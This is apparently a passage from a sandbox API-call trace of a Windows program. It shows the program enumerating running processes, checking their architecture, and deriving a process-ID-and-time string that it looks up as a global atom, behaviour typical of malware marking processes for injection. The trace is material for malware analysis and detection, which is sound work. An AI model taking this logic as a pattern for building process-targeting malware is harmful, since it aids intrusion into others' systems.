	[0127.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0127.675] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.675] CloseHandle (hObject=0x2dc) returned 1
	[0127.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0127.675] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.675] CloseHandle (hObject=0x2dc) returned 1
	[0127.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0127.676] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.676] CloseHandle (hObject=0x2dc) returned 1
	[0127.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0127.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0127.677] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.677] CloseHandle (hObject=0x2dc) returned 1
	[0127.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0127.677] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.677] CloseHandle (hObject=0x2dc) returned 1
	[0127.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0127.677] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.677] CloseHandle (hObject=0x2dc) returned 1
	[0127.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0127.678] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.678] CloseHandle (hObject=0x2dc) returned 1
	[0127.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0127.678] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.678] CloseHandle (hObject=0x2dc) returned 1
	[0127.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0127.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.679] CloseHandle (hObject=0x2dc) returned 1
	[0127.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0127.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.679] CloseHandle (hObject=0x2dc) returned 1
	[0127.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0127.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.680] CloseHandle (hObject=0x2dc) returned 1
	[0127.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0127.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.680] CloseHandle (hObject=0x2dc) returned 1
	[0127.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0127.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.680] CloseHandle (hObject=0x2dc) returned 1
	[0127.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0127.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.681] CloseHandle (hObject=0x2dc) returned 1
	[0127.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0127.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.681] CloseHandle (hObject=0x2dc) returned 1
	[0127.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0127.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.682] CloseHandle (hObject=0x2dc) returned 1
	[0127.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0127.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.682] CloseHandle (hObject=0x2dc) returned 1
	[0127.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0127.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.683] CloseHandle (hObject=0x2dc) returned 1
	[0127.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0127.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.683] CloseHandle (hObject=0x2dc) returned 1
	[0127.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0127.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.684] CloseHandle (hObject=0x2dc) returned 1
	[0127.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0127.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.684] CloseHandle (hObject=0x2dc) returned 1
	[0127.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0127.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.685] CloseHandle (hObject=0x2dc) returned 1
	[0127.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0127.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.685] CloseHandle (hObject=0x2dc) returned 1
	[0127.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0127.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.685] CloseHandle (hObject=0x2dc) returned 1
	[0127.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.686] CloseHandle (hObject=0x2dc) returned 1
	[0127.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.686] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.687] GetLastError () returned 0x5
	[0127.688] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.688] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.688] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.688] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.689] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.690] GetLastError () returned 0x5
	[0127.691] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.691] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.691] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.691] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.691] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.691] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.691] CloseHandle (hObject=0x2dc) returned 1
	[0127.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0127.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.692] CloseHandle (hObject=0x2dc) returned 1
	[0127.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0127.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.692] CloseHandle (hObject=0x2dc) returned 1
	[0127.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0127.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.693] CloseHandle (hObject=0x2dc) returned 1
	[0127.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0127.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.693] CloseHandle (hObject=0x2dc) returned 1
	[0127.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0127.694] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.694] CloseHandle (hObject=0x2dc) returned 1
	[0127.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0127.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0127.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0127.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0127.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
